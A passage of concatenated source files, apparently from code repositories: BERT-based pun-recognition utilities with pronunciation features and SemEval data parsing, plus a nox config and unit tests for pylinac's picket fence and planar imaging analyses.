input_mask=input_mask,
segment_ids=segment_ids,
label_id=label_ids,
prons_id=prons_ids,
prons_att_mask=prons_att_mask))
return features, prons_map
def convert_examples_to_pron_SC_features(examples, label_list, max_seq_length, max_pron_length, tokenizer, prons_map):
"""Loads a data file into a list of `InputBatch`s."""
label_map = {label : i for i, label in enumerate(label_list)}
print(label_map)
features = []
for (ex_index,example) in enumerate(examples):
textlist = example.text_a.split(' ')
label_ids = label_map[example.label]
pronslist = [x.split(',') for x in example.prons.split(' ')]
#assert(len(textlist) == len(pronslist))
if len(textlist) != len(pronslist):
print(textlist)
print(pronslist)
sys.exit()
tokens = []
prons = []
prons_mask = []
for i, word in enumerate(textlist):
token = tokenizer.tokenize(word)
tokens.extend(token)
pron_1 = pronslist[i] # the complete prons of a word
pron_2 = [] # save the ids of prons of a word
for j in range(len(pron_1)):
index = len(prons_map) # expand the map with new prons
if pron_1[j] not in prons_map:
prons_map[pron_1[j]] = index + 1
pron_2.append(prons_map[pron_1[j]])
pron_mask_2 = [1] * len(pron_2)
if len(pron_2) >= max_pron_length:
pron_2 = pron_2[0:max_pron_length] # trunk it if too long
pron_mask_2 = pron_mask_2[0:max_pron_length]
else:
pron_2 += [0] * (max_pron_length - len(pron_2)) # pad it if too short
pron_mask_2 += [0] * (max_pron_length - len(pron_mask_2))
for m in range(len(token)):
if m == 0:
prons.append(pron_2) # only send the prons to the first piece_token of a word
prons_mask.append(pron_mask_2)
else:
prons.append([0] * max_pron_length) # pad other piece_token with 0's
prons_mask.append([0] * max_pron_length)
if len(tokens) >= max_seq_length - 1:
tokens = tokens[0:(max_seq_length - 2)]
prons = prons[0:(max_seq_length - 2)]
prons_mask = prons_mask[0:(max_seq_length - 2)]
ntokens = []
segment_ids = []
prons_ids = []
prons_att_mask = []
ntokens.append("[CLS]")
segment_ids.append(0)
prons_ids.append([0] * max_pron_length) # pad the cls with 0's
prons_att_mask.append([0] * max_pron_length)
for i, token in enumerate(tokens):
ntokens.append(token)
segment_ids.append(0)
prons_ids.append(prons[i])
prons_att_mask.append(prons_mask[i])
ntokens.append("[SEP]")
segment_ids.append(0)
prons_ids.append([0] * max_pron_length) # pad the sep with 0's
prons_att_mask.append([0] * max_pron_length)
input_ids = tokenizer.convert_tokens_to_ids(ntokens)
input_mask = [1] * len(input_ids)
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
prons_ids.append([0] * max_pron_length)
prons_att_mask.append([0] * max_pron_length)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
assert len(prons_ids) == max_seq_length
assert len(prons_att_mask) == max_seq_length
if ex_index < 3:
logger.info("*** Example ***")
logger.info("guid: %s" % (example.guid))
logger.info("tokens: %s" % " ".join([str(x) for x in tokens]))
logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
logger.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
#logger.info("segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
logger.info("prons_ids: %s" % " ".join([str(x) for x in prons_ids]))
logger.info("label: %s (id = %d)" % (example.label, label_ids))
# logger.info("label: %s (id = %d)" % (example.label, label_ids))
features.append(
InputPronFeatures(input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
label_id=label_ids,
prons_id=prons_ids,
prons_att_mask=prons_att_mask))
return features, prons_map
def embed_load(file_input):
f = open(file_input, 'r')
line = f.readline()
pron_map = {}
num,dim = line.rstrip().split(' ')
line = f.readline()
embeddings = [[0.0]*int(dim)]
while line != '':
vec = line.rstrip().split(' ')
token = vec[0]
emb = vec[1:]
if token not in pron_map:
pron_map[token] = len(pron_map) + 1
embeddings.append([float(x) for x in emb])
line = f.readline()
return pron_map, embeddings
def embed_extend(embeddings, length):
dim = len(embeddings[0])
for i in range(length+1-len(embeddings)):
embeddings.append(np.random.random([dim])*2-1)
return embeddings
def write_scores(file_output, y):
with open(file_output, 'wb') as f:
pickle.dump(y, f)
def f1_2d(tmp2, tmp1):
return f1_score(tmp2, tmp1), recall_score(tmp2,tmp1), precision_score(tmp2,tmp1)
def visualize_local(logits, label_ids, input_ids, prons_ids, prons_att_mask, att, label_map, prons_map, tokenizer):
"""
torch.Size([8, 128])
torch.Size([8, 128])
torch.Size([8, 128])
torch.Size([8, 128, 5])
torch.Size([8, 128, 5])
torch.Size([8, 128, 5])
"""
prons_map = {int(prons_map[pron]): pron for pron in prons_map}
f = open('results/pron_viz.json', 'a')
results = {}
for i in range(len(label_ids)):
for j in range(len(label_ids[i])):
ran = random.random()
if label_ids[i][j] != 0 and label_map[label_ids[i][j]] == label_map[logits[i][j]] and label_map[label_ids[i][j]] == "P":
mask = prons_att_mask[i][j]
score = att[i][j]
tmp = tokenizer.convert_ids_to_tokens(input_ids[i])
try:
N = tmp.index('[PAD]')
results['sent'] = tmp[:N]
except:
results['sent'] = tmp
results['start'] = tokenizer.convert_ids_to_tokens([int(input_ids[i][j])])[0]
results['pron'] = {}
for k,m in enumerate(mask):
if m == 0: break
results['pron'][prons_map[prons_ids[i][j][k]]] = float(score[k])
json.dump(results, f)
f.write('\n')
return
def visualize_self(logits, label_ids, input_ids, input_mask, att, tokenizer):
"""
torch.Size(8)
torch.Size(8)
torch.Size([8, 128])
torch.Size([8, 128, 128])
"""
f = open('results/token_viz.json', 'a')
results = {}
for i in range(len(input_ids)):
if label_ids[i] == logits[i] and label_ids[i] == 1:
try:
N = input_mask[i].index(0)
ids = input_ids[i][:N]
except:
ids = input_ids[i]
tokens = tokenizer.convert_ids_to_tokens(input_ids[i])
results['sent_'+str(i)] = tokens
for j in range(len(tokens)):
results[tokens[j] + '_' + str(j)] = att[i][j]
json.dump(results, f)
f.write('\n')
return
```
#### File: joey1993/pun-recognition/cv_eval_sc.py
```python
import pickle
import sys
from bert_utils import f1_2d
def main(argv):
file_dir = argv[1]
cv = int(argv[2])
preds,truths = [], []
for i in range(cv):
with open(file_dir+"pred_"+str(i), 'rb') as f:
pred = pickle.load(f)
preds.extend(pred)
with open(file_dir+"true_"+str(i), 'rb') as f:
true = pickle.load(f)
truths.extend(true)
assert (len(preds) == len(truths))
f1, recall, precision = f1_2d(truths, preds)
return "precision, recall, f1: {}, {}, {}".format(precision*100, recall*100, f1*100)
if __name__ == "__main__":
print(main(sys.argv))
```
#### File: semeval2017/data_with_pronunciation/parse_xml_pl.py
```python
import xml.etree.ElementTree as ET
import sys
import csv
import random
def read_xml(input_file):
tree = ET.parse(input_file)
root = tree.getroot()
original_sentences,text_ids = [],[]
for child in root:
original_sentence = []
text_id = child.attrib['id']
for i in range(len(child)):
original_sentence.append(child[i].text)
original_sentences.append(original_sentence)
text_ids.append(text_id)
return original_sentences,text_ids
def read_labels(input_file):
labels,label_ids = [], []
with open(input_file, "r") as f:
contents = f.readlines()
for line in contents:
vec = line.strip().split('\t')
label_ids.append(vec[0])
labels.append(vec[1])
return labels,label_ids
def write_ner(sent, tag, pron, f):
index = int(tag.split('_')[-1])
for i in range(len(sent)):
prons = ','.join(pron[i].split(' '))#.encode('utf-8')
sents = sent[i]#.encode('utf-8')
if index == i + 1:
f.write(sents + ' ' + 'P' + ' ' + prons + '\n')
else:
f.write(sents + ' ' + 'O' + ' ' + prons + '\n')
f.write('\n')
def main(argv):
sents,ids1 = read_xml(argv[1])
labs,ids2 = read_labels(argv[2])
prons,ids3 = read_xml(argv[3])
output = argv[4]
assert (ids1 == ids2)
assert (ids2 == ids3)
#file_name = argv[1].replace('.xml','')
#with open(file_name, 'w') as f:
# writer = csv.writer(f, delimiter='\t')
# for i in range(len(sents)):
# writer.writerow([str(labs[i]),str(' '.join(sents[i]))])
train = open(output+'train.txt','w')
test = open(output+'test.txt','w')
dev = open(output+'valid.txt', 'w')
for i in range(len(sents)):
print(sents[i])
write_ner(sents[i], labs[i], prons[i], train)
#num = random.random()
#if num < 0.1:
# write_ner(sents[i], labs[i], prons[i], dev)
# #dev.write(sent)
#elif num < 0.2:
# write_ner(sents[i], labs[i], prons[i], test)
# #test.write(sent)
#else:
# write_ner(sents[i], labs[i], prons[i], train)
# #train.write(sent)
if __name__ == "__main__":
main(sys.argv)
``` |
{
"source": "joey5656/pylinac",
"score": 2
} |
#### File: joey5656/pylinac/noxfile.py
```python
import nox
@nox.session(python=['3.6', '3.9'], reuse_venv=False)
def run_tests(session):
session.install('-r', 'requirements-dev.txt')
session.run("pytest", '-n', '5')
@nox.session(reuse_venv=False)
def serve_docs(session):
session.install('sphinx')
session.install('sphinx-autobuild')
session.install('matplotlib')
session.run("sphinx-autobuild", "docs/source", "docs/build", "--port", "8777")
```
#### File: pylinac/tests_basic/test_picketfence.py
```python
import io
import os
import os.path as osp
import tempfile
from unittest import TestCase, skip
import matplotlib.pyplot as plt
from pylinac.core import image
from pylinac.picketfence import PicketFence, Orientation, PFResult, MLCArrangement
from tests_basic.utils import save_file, CloudFileMixin, get_file_from_cloud_test_repo, InitTesterMixin, \
FromURLTesterMixin, FromDemoImageTesterMixin
TEST_DIR = 'picket_fence'
class TestInstantiation(TestCase, InitTesterMixin, FromURLTesterMixin, FromDemoImageTesterMixin):
klass = PicketFence
init_file = ['picket_fence', 'AS500_PF.dcm']
url = 'EPID-PF-LR.dcm'
def test_filter_on_load(self):
PicketFence(self.full_init_file, filter=3) # shouldn't raise
def test_load_with_log(self):
log_file = get_file_from_cloud_test_repo([TEST_DIR, 'PF_log.bin'])
pf_file = get_file_from_cloud_test_repo([TEST_DIR, 'PF.dcm'])
pf = PicketFence(pf_file, log=log_file)
pf.analyze()
def test_load_from_file_object(self):
pf_file = get_file_from_cloud_test_repo([TEST_DIR, 'PF.dcm'])
ref_pf = PicketFence(pf_file)
ref_pf.analyze()
with open(pf_file, "rb") as f:
pf = PicketFence(f)
pf.analyze()
self.assertIsInstance(pf, PicketFence)
self.assertEqual(pf.percent_passing, ref_pf.percent_passing)
def test_load_from_stream(self):
pf_file = get_file_from_cloud_test_repo([TEST_DIR, 'PF.dcm'])
ref_pf = PicketFence(pf_file)
ref_pf.analyze()
with open(pf_file, "rb") as f:
s = io.BytesIO(f.read())
pf = PicketFence(s)
pf.analyze()
self.assertIsInstance(pf, PicketFence)
self.assertEqual(pf.percent_passing, ref_pf.percent_passing)
def test_custom_MLC_arrangement(self):
mlc_setup = MLCArrangement(leaf_arrangement=[(10, 10), (40, 5), (10, 10)])
# pass it in to the mlc parameter
path = get_file_from_cloud_test_repo([TEST_DIR, 'AS500_PF.dcm'])
pf = PicketFence(path, mlc=mlc_setup)
# shouldn't raise
pf.analyze()
pf.results()
pf.results_data()
def test_mlc_string(self):
mlc_setup = 'Millennium'
# pass it in to the mlc parameter
path = get_file_from_cloud_test_repo([TEST_DIR, 'AS500_PF.dcm'])
pf = PicketFence(path, mlc=mlc_setup)
# shouldn't raise
pf.analyze()
pf.results()
pf.results_data()
def test_image_kwargs(self):
path = get_file_from_cloud_test_repo([TEST_DIR, 'AS500_PF.dcm'])
# do normal analysis
phan = PicketFence(path)
phan.analyze()
offset = phan.results_data().offsets_from_cax_mm[0]
# pass kwarg; use same dpi as image; CAX offset should be the same, would be different with different DPI
img = image.load(path)
phan = PicketFence(path, image_kwargs={'dpi': img.dpi})
phan.analyze()
offset_manual_dpi = phan.results_data().offsets_from_cax_mm[0]
self.assertEqual(offset, offset_manual_dpi)
class TestAnalyze(TestCase):
@classmethod
def setUpClass(cls):
cls.pf = PicketFence.from_demo_image()
cls.pf.analyze()
def test_bad_tolerance_values(self):
self.assertRaises(ValueError, self.pf.analyze, 0.2, 0.3)
def test_demo(self):
PicketFence.run_demo()
def test_publish_pdf(self):
with tempfile.NamedTemporaryFile(delete=False) as t:
self.pf.publish_pdf(t.name, notes="stuff", metadata={"Unit": "TB1"})
os.remove(t.name)
def test_results_data(self):
data = self.pf.results_data()
self.assertIsInstance(data, PFResult)
self.assertEqual(data.max_error_mm, self.pf.max_error)
data_dict = self.pf.results_data(as_dict=True)
self.assertIsInstance(data_dict, dict)
self.assertIn("pylinac_version", data_dict)
def test_no_measurements_suggests_inversion(self):
file_loc = get_file_from_cloud_test_repo([TEST_DIR, 'noisy-FFF-wide-gap-pf.dcm'])
pf = PicketFence(file_loc)
pf.image.invert()
with self.assertRaises(ValueError):
pf.analyze(invert=False)
def test_orientation_passing_as(self):
# below shouldn't raise
# as enum
pf = PicketFence.from_demo_image()
pf.analyze(orientation=Orientation.UP_DOWN)
# as str
pf = PicketFence.from_demo_image()
pf.analyze(orientation="Up-Down")
def test_histogram(self):
pf = PicketFence.from_demo_image()
pf.analyze()
pf.plot_histogram()
pf2 = PicketFence.from_demo_image()
# can't plot before analyzing
with self.assertRaises(ValueError):
pf2.plot_histogram()
def test_failed_leaves_before_analyzed(self):
pf = PicketFence.from_demo_image()
with self.assertRaises(ValueError):
pf.failed_leaves()
def test_failed_leaves_traditional(self):
pf = PicketFence.from_demo_image()
pf.analyze(separate_leaves=False, tolerance=0.05)
self.assertEqual(
set(pf.failed_leaves()),
{12, 14, 16, 17, 18, 19, 26, 29, 31, 32, 33, 35, 39, 42, 43, 47},
)
def test_failed_leaves_separate(self):
pf = PicketFence.from_demo_image()
pf.analyze(separate_leaves=True, tolerance=0.15, nominal_gap_mm=3)
self.assertEqual(
set(pf.failed_leaves()),
{
"A12",
"B12",
"A13",
"B13",
"A14",
"B14",
"A15",
"B15",
"B16",
"B17",
"A18",
"B18",
"B19",
"A19",
"A20",
"B20",
"B22",
"A23",
"B23",
"A24",
"B24",
"A25",
"B26",
"A27",
"B27",
"A28",
"B28",
"B29",
"B30",
"B31",
"A32",
"B32",
"A33",
"B34",
"B35",
"A35",
"A36",
"B36",
"A37",
"B37",
"A38",
"B38",
"B39",
"A39",
"A40",
"B40",
"B41",
"A41",
"B42",
"A43",
"B43",
"B44",
"A44",
"B45",
"A45",
"A46",
"B46",
"B47",
"A47",
},
)
class TestPlottingSaving(TestCase):
@classmethod
def setUpClass(cls):
cls.pf = PicketFence.from_demo_image()
cls.pf.analyze()
cls.pf_updown = PicketFence.from_demo_image()
cls.pf_updown.image.rot90()
cls.pf_updown.analyze()
@classmethod
def tearDownClass(cls):
plt.close("all")
def test_plotting(self):
self.pf.plot_analyzed_image()
self.pf_updown.plot_analyzed_image()
def test_saving_image(self):
save_file(self.pf.save_analyzed_image)
save_file(self.pf_updown.save_analyzed_image)
def test_publish_pdf(self):
with tempfile.NamedTemporaryFile(delete=False) as t:
self.pf.publish_pdf(t.name, notes='stuff', metadata={'Unit': 'TB1'})
os.remove(t.name)
def test_results_data(self):
data = self.pf.results_data()
self.assertIsInstance(data, PFResult)
self.assertEqual(data.max_error_mm, self.pf.max_error)
data_dict = self.pf.results_data(as_dict=True)
self.assertIsInstance(data_dict, dict)
self.assertIn('pylinac_version', data_dict)
def test_plot_histogram(self):
self.pf.plot_histogram()
def test_save_histogram(self):
# to disk
save_file(self.pf.save_histogram)
# to binary stream
save_file(self.pf.save_histogram, as_file_object='b')
def test_plot_leaf_profile(self):
self.pf.plot_leaf_profile(20, 3)
def test_save_leaf_profile(self):
# to disk
save_file(self.pf.save_leaf_profile, 20, 3)
# to binary stream
save_file(self.pf.save_leaf_profile, 20, 3, as_file_object='b')
class PFTestMixin(CloudFileMixin):
"""Base Mixin for testing a picketfence image."""
dir_path = ['picket_fence']
picket_orientation = Orientation.UP_DOWN
mlc = "Millennium"
num_pickets = 10
pass_num_pickets = False
percent_passing = 100
max_error = 0
abs_median_error = 0
sag_adjustment = 0
invert = False
passes = True
log = None
mean_picket_spacing = 15
separate_leaves = False
nominal_gap_mm = 1
mlc_skew = 0
max_error_picket = None
max_error_leaf = None
@classmethod
def get_logfile(cls):
"""Return the canonical path to the log file."""
if cls.log is not None:
return osp.join(*cls.dir_path, *cls.log)
@classmethod
def setUpClass(cls):
cls.pf = PicketFence(cls.get_filename(), log=cls.get_logfile())
if cls.pass_num_pickets:
cls.pf.analyze(
sag_adjustment=cls.sag_adjustment,
num_pickets=cls.num_pickets,
invert=cls.invert,
separate_leaves=cls.separate_leaves,
nominal_gap_mm=cls.nominal_gap_mm,
)
else:
cls.pf.analyze(
sag_adjustment=cls.sag_adjustment,
invert=cls.invert,
separate_leaves=cls.separate_leaves,
nominal_gap_mm=cls.nominal_gap_mm,
)
def test_passed(self):
self.assertEqual(self.pf.passed, self.passes)
def test_picket_orientation(self):
self.assertEqual(self.pf.orientation, self.picket_orientation)
def test_num_pickets(self):
self.assertEqual(self.pf.num_pickets, self.num_pickets)
def test_percent_passing(self):
self.assertAlmostEqual(self.pf.percent_passing, self.percent_passing, delta=1)
def test_max_error(self):
self.assertAlmostEqual(self.pf.max_error, self.max_error, delta=0.1)
def test_abs_median_error(self):
self.assertAlmostEqual(
self.pf.abs_median_error, self.abs_median_error, delta=0.05
)
def test_picket_spacing(self):
self.assertAlmostEqual(
self.pf.mean_picket_spacing, self.mean_picket_spacing, delta=0.5
)
def test_mlc_skew(self):
self.assertAlmostEqual(self.pf.mlc_skew(), self.mlc_skew, delta=0.3)
def test_max_picket(self):
if self.max_error_picket:
self.assertEqual(self.pf.max_error_picket, self.max_error_picket)
def test_max_leaf(self):
if self.max_error_leaf:
self.assertIn(self.max_error_leaf, self.pf.max_error_leaf)
class PFDemo(PFTestMixin, TestCase):
"""Tests specifically for the EPID demo image."""
picket_orientation = Orientation.UP_DOWN
max_error = 0.08
abs_median_error = 0.06
max_error_picket = 0
max_error_leaf = 31
@classmethod
def setUpClass(cls):
cls.pf = PicketFence.from_demo_image()
cls.pf.analyze(sag_adjustment=cls.sag_adjustment)
@classmethod
def tearDownClass(cls):
pass # override delete behavior
def test_demo_lower_tolerance(self):
pf = PicketFence.from_demo_image()
pf.analyze(0.15, action_tolerance=0.05)
pf.plot_analyzed_image()
self.assertAlmostEqual(pf.percent_passing, 100, delta=1)
class WideGapSimulation(PFTestMixin, TestCase):
file_name = 'noisy-wide-gap-pf.dcm'
max_error = 0.11
abs_median_error = 0.06
num_pickets = 7
mean_picket_spacing = 30
class WideGapSimulationSeparate(WideGapSimulation):
separate_leaves = True
nominal_gap_mm = 16
max_error = 0.3
abs_median_error = 0.07
percent_passing = 100
class FFFWideGapSimulation(PFTestMixin, TestCase):
file_name = 'noisy-FFF-wide-gap-pf.dcm'
max_error = 0.17
abs_median_error = 0.06
num_pickets = 7
mean_picket_spacing = 30
class AS1200(PFTestMixin, TestCase):
"""Tests for the AS1200 image."""
file_name = 'AS1200.dcm'
max_error = 0.08
abs_median_error = 0.02
class ClinacWeirdBackground(PFTestMixin, TestCase):
file_name = 'Clinac-weird-background.dcm'
max_error = 0.12
abs_median_error = 0.02
num_pickets = 5
mean_picket_spacing = 50
invert = True
class ElektaCloseEdges(PFTestMixin, TestCase):
file_name = 'PF,-Elekta,-pickets-near-edges.dcm'
max_error = 0.23
abs_median_error = 0.07
num_pickets = 9
mean_picket_spacing = 30
mlc_skew = -0.7
class ElektaCloseEdgesRot90(PFTestMixin, TestCase):
file_name = 'PF,-Elekta,-pickets-near-edges.dcm'
max_error = 0.23
abs_median_error = 0.07
num_pickets = 9
mean_picket_spacing = 30
picket_orientation = Orientation.LEFT_RIGHT
mlc_skew = 0.7
@classmethod
def setUpClass(cls):
cls.pf = PicketFence(cls.get_filename(), log=cls.get_logfile())
cls.pf.image.rot90()
cls.pf.analyze(sag_adjustment=cls.sag_adjustment)
class MultipleImagesPF(PFTestMixin, TestCase):
"""Test of a multiple image picket fence; e.g. EPID images."""
max_error = 0.112
abs_median_error = 0.019
picket_orientation = Orientation.LEFT_RIGHT
num_pickets = 5
mean_picket_spacing = 30
delete_file = False
@classmethod
def setUpClass(cls):
path1 = get_file_from_cloud_test_repo([TEST_DIR, 'combo-jaw.dcm'])
path2 = get_file_from_cloud_test_repo([TEST_DIR, 'combo-mlc.dcm'])
cls.pf = PicketFence.from_multiple_images([path1, path2], stretch_each=True)
cls.pf.analyze(
sag_adjustment=cls.sag_adjustment,
orientation=Orientation.LEFT_RIGHT
)
class AS500(PFTestMixin, TestCase):
"""Tests for the AS500 image."""
file_name = 'AS500_PF.dcm'
max_error = 0.15
abs_median_error = 0.04
class AS5002(PFTestMixin, TestCase):
"""Tests for the AS500#2 image."""
file_name = 'AS500#2.dcm'
max_error = 0.12
abs_median_error = 0.03
mlc_skew = -0.3
class AS5003(PFTestMixin, TestCase):
"""Tests for the AS500#3 image."""
file_name = 'AS500#3.dcm'
max_error = 0.16
abs_median_error = 0.03
class AS5004(PFTestMixin, TestCase):
"""Tests for the AS500#4 image."""
file_name = 'AS500#4.dcm'
max_error = 0.28
abs_median_error = 0.06
mlc_skew = -0.3
class AS5005(PFTestMixin, TestCase):
"""Tests for the AS500#4 image."""
file_name = 'AS500#5.dcm'
max_error = 0.23
abs_median_error = 0.04
class AS5006(PFTestMixin, TestCase):
"""Tests for the AS500#4 image."""
file_name = 'AS500#6.dcm'
picket_orientation = Orientation.LEFT_RIGHT
max_error = 0.23
abs_median_error = 0.06
class AS5007(PFTestMixin, TestCase):
"""Tests for the AS500#4 image."""
file_name = 'AS500#7.dcm'
max_error = 0.24
abs_median_error = 0.05
mlc_skew = -0.3
class AS5008(PFTestMixin, TestCase):
"""Tests for the AS500#4 image."""
file_name = 'AS500#8.dcm'
max_error = 0.2
abs_median_error = 0.04
mlc_skew = -0.3
class AS5009(PFTestMixin, TestCase):
"""Tests for the AS500#4 image."""
file_name = 'AS500#9.dcm'
max_error = 0.24
abs_median_error = 0.04
mlc_skew = -0.3
class AS50010(PFTestMixin, TestCase):
"""Tests for the AS500#4 image."""
file_name = 'AS500#10.dcm'
picket_orientation = Orientation.LEFT_RIGHT
max_error = 0.24
abs_median_error = 0.05
class AS500error(PFTestMixin, TestCase):
"""Tests for the AS500#2 image."""
file_name = 'AS500-error.dcm'
num_pickets = 6
percent_passing = 99
max_error = 0.55
abs_median_error = 0.07
passes = False
mean_picket_spacing = 20
mlc_skew = -0.3
class AS1000(PFTestMixin, TestCase):
"""Tests for the AS1000 image."""
file_name = 'AS1000_PF.dcm'
max_error = 0.29
abs_median_error = 0.06
class AS1000_2(PFTestMixin, TestCase):
"""Tests for the AS1000 image."""
file_name = 'AS1000#2.dcm'
max_error = 0.24
abs_median_error = 0.07
class AS1000_3(PFTestMixin, TestCase):
"""Tests for the AS1000 image."""
file_name = 'AS1000#3.dcm'
max_error = 0.13
abs_median_error = 0.05
class AS1000_4(PFTestMixin, TestCase):
"""Tests for the AS1000 image."""
file_name = 'AS1000#4.dcm'
picket_orientation = Orientation.LEFT_RIGHT
max_error = 0.18
abs_median_error = 0.05
class AS1000_90(PFTestMixin, TestCase):
"""Tests for the AS1000 image."""
file_name = 'AS1000-90.dcm'
picket_orientation = Orientation.LEFT_RIGHT
max_error = 0.23
abs_median_error = 0.05
class AS1000HDSmall(PFTestMixin, TestCase):
"""Tests for the AS1000 image."""
file_name = 'AS1000-HD-small.dcm'
mlc = 'HD'
max_error = 0.05
abs_median_error = 0.05
class AS1000HDFull(PFTestMixin, TestCase):
"""Tests for the AS1000 image with a smaller pattern (only inner leaves)."""
file_name = 'AS1000-HD-full.dcm'
mlc = 'HD'
max_error = 0.2
abs_median_error = 0.06
class AS1000HDFullVMAT(PFTestMixin, TestCase):
"""Tests for the AS1000 image with a smaller pattern (only inner leaves)."""
file_name = 'AS1000-HD-full-VMAT.dcm'
mlc = 'HD'
max_error = 0.2
abs_median_error = 0.08
@skip # says file isn't real DICOM TODO: Figure out why not real DICOM
class AS1000HDFullError(PFTestMixin, TestCase):
"""Tests for the AS1000 image with a few errors introduced."""
file_name = 'AS1000-HD-full-error.dcm'
mlc = 'HD'
num_pickets = 6
abs_median_error = 0.03
max_error = 0.39
def test_lower_tolerance_fails(self):
"""This image has an introduced error; this should catch with a reasonable tolerance."""
pf = PicketFence(self.file_path)
pf.analyze(tolerance=0.3, hdmlc=self.hdmlc)
self.assertFalse(pf.passed)
class AS1200(PFTestMixin, TestCase):
"""Tests for the AS1200 image."""
file_name = 'AS1200.dcm'
max_error = 0.08
abs_median_error = 0.02
class AS1200Error(PFTestMixin, TestCase):
"""Tests for the AS1200 image."""
file_name = 'AS1200-error.dcm'
num_pickets = 6
max_error = 0.48
abs_median_error = 0.05
sag_adjustment = -1.2
mean_picket_spacing = 20
class AS1200ExtendedSID(PFTestMixin, TestCase):
"""Tests for the AS1200 image."""
file_name = 'AS1200-ExtendedSID.dcm'
max_error = 0.12
abs_median_error = 0.04
class AS1200ExtendedSIDVMAT(PFTestMixin, TestCase):
"""Tests for the AS1200 image."""
file_name = 'AS1200-ExtendedSID-VMAT.dcm'
max_error = 0.18
abs_median_error = 0.06
# @expectedFailure # too dirty
# class AS1200HD(PFTestMixin, TestCase):
# """Tests for the AS1200 image."""
# file_name = 'AS1200-HD.dcm'
# mlc = 'HD'
# max_error = 0.05
# abs_median_error = 0.02
# num_pickets = 10
# pass_num_pickets = True
# @expectedFailure # terribly dirty image with artifacts all over.
# class AS1200HDTranslated(PFTestMixin, TestCase):
# """Tests for the AS1200 image."""
# file_name = 'AS1200-HD-translated.dcm'
# mlc = 'HD'
# max_error = 0.15
# abs_median_error = 0.02
# num_pickets = 10
# pass_num_pickets = True
class ChicagoNoError(PFTestMixin, TestCase):
dir_path = [TEST_DIR, 'Chicago']
file_name = 'PF no error.dcm'
# log = ['Chicago', 'PF no error tlog.bin']
mlc = 'HD'
max_error = 0.24
class ChicagoError(PFTestMixin, TestCase):
dir_path = [TEST_DIR, 'Chicago']
file_name = 'PF point2mm error.dcm'
# log = ['Chicago', 'PF point2mm tlog.bin']
mlc = 'HD'
max_error = 0.3
@skip
class CharlestonRA(PFTestMixin, TestCase):
file_name = ['Charleston', 'TB1', 'July2016', 'RA.dcm']
max_error = 0.17
@skip
class CharlestonG0(PFTestMixin, TestCase):
file_name = ['Charleston', 'TB1', 'July2016', 'G0.dcm']
max_error = 0.1
```
#### File: pylinac/tests_basic/test_planar_imaging.py
```python
import io
import os.path as osp
from typing import Callable
from unittest import TestCase, skip
import matplotlib.pyplot as plt
import numpy as np
import pytest
from pylinac import LeedsTOR, StandardImagingQC3, LasVegas, DoselabMC2kV, DoselabMC2MV
from pylinac.core import image
from pylinac.planar_imaging import PlanarResult, SNCkV, SNCMV, StandardImagingQCkV, PTWEPIDQC, StandardImagingFC2
from tests_basic.utils import save_file, CloudFileMixin, get_file_from_cloud_test_repo
TEST_DIR = 'planar_imaging'
class GeneralTests(TestCase):
def test_from_file_object(self):
path = get_file_from_cloud_test_repo([TEST_DIR, 'Leeds_ccw.dcm'])
with open(path, 'rb') as f:
phan = LeedsTOR(f)
phan.analyze()
self.assertIsInstance(phan, LeedsTOR)
def test_from_stream(self):
path = get_file_from_cloud_test_repo([TEST_DIR, 'Leeds_ccw.dcm'])
with open(path, 'rb') as f:
s = io.BytesIO(f.read())
phan = LeedsTOR(s)
phan.analyze()
self.assertIsInstance(phan, LeedsTOR)
def test_overrides(self):
phan = DoselabMC2kV.from_demo_image()
phan.analyze()
def test_results_data(self):
phan = LeedsTOR.from_demo_image()
phan.analyze()
data = phan.results_data()
self.assertIsInstance(data, PlanarResult)
self.assertEqual(data.median_contrast, np.median([roi.contrast for roi in phan.low_contrast_rois]))
data_dict = phan.results_data(as_dict=True)
self.assertIsInstance(data_dict, dict)
self.assertEqual(len(data_dict), 8)
self.assertIn('pylinac_version', data_dict)
def test_results_data_no_mtf(self):
phan = LasVegas.from_demo_image()
phan.analyze()
data_dict = phan.results_data(as_dict=True)
self.assertEqual(len(data_dict), 8)
def test_multiple_plots(self):
phan = LeedsTOR.from_demo_image()
phan.analyze()
figs, names = phan.plot_analyzed_image(split_plots=True)
self.assertEqual(len(figs), 3)
files = phan.save_analyzed_image(filename='a.png', split_plots=True)
names = ('a_image.png', 'a_low_contrast.png', 'a_high_contrast.png')
for name in names:
self.assertIn(name, files)
# regular single plot produces one image/file
figs, names = phan.plot_analyzed_image()
self.assertEqual(len(figs), 0)
name = 'b.png'
phan.save_analyzed_image('b.png')
self.assertTrue(osp.isfile(name))
# stream buffer shouldn't fail
with io.BytesIO() as tmp:
phan.save_analyzed_image(tmp)
# to streams should return streams
streams = phan.save_analyzed_image(split_plots=True, to_streams=True)
self.assertEqual(len(streams.keys()), 3)
with self.assertRaises(ValueError):
phan.save_analyzed_image() # no filename and no streams is an error
def test_passing_image_kwargs(self):
path = get_file_from_cloud_test_repo([TEST_DIR, 'Leeds_ccw.dcm'])
# do normal analysis
phan = LeedsTOR(path)
phan.analyze()
x = phan.results_data().phantom_center_x_y[0]
# pass kwarg; use same dpi as image; results should be the same.
img = image.load(path)
phan = LeedsTOR(path, image_kwargs={'dpi': img.dpi})
phan.analyze()
x_manual_dpi = phan.results_data().phantom_center_x_y[0]
self.assertEqual(x, x_manual_dpi)
class PlanarPhantomMixin(CloudFileMixin):
klass: Callable
dir_path = ['planar_imaging']
mtf_50 = None
invert = False
ssd = 1000
file_name = None
rois_seen = None
@classmethod
def setUpClass(cls):
if not cls.file_name:
cls.instance = cls.klass.from_demo_image()
else:
cls.instance = cls.klass(cls.get_filename())
cls.instance.analyze(ssd=cls.ssd, invert=cls.invert)
@classmethod
def tearDownClass(cls):
plt.close('all')
del cls.instance
def test_plotting(self):
self.instance.plot_analyzed_image()
self.instance.plot_analyzed_image(low_contrast=False, high_contrast=False)
self.instance.plot_analyzed_image(image=False, low_contrast=False, high_contrast=False)
def test_saving(self):
self.instance.plot_analyzed_image()
save_file(self.instance.save_analyzed_image)
def test_pdf(self):
save_file(self.instance.publish_pdf)
def test_mtf(self):
if self.mtf_50 is not None:
self.assertAlmostEqual(self.mtf_50, self.instance.mtf.relative_resolution(50), delta=0.3)
def test_rois_seen(self):
if self.rois_seen is not None:
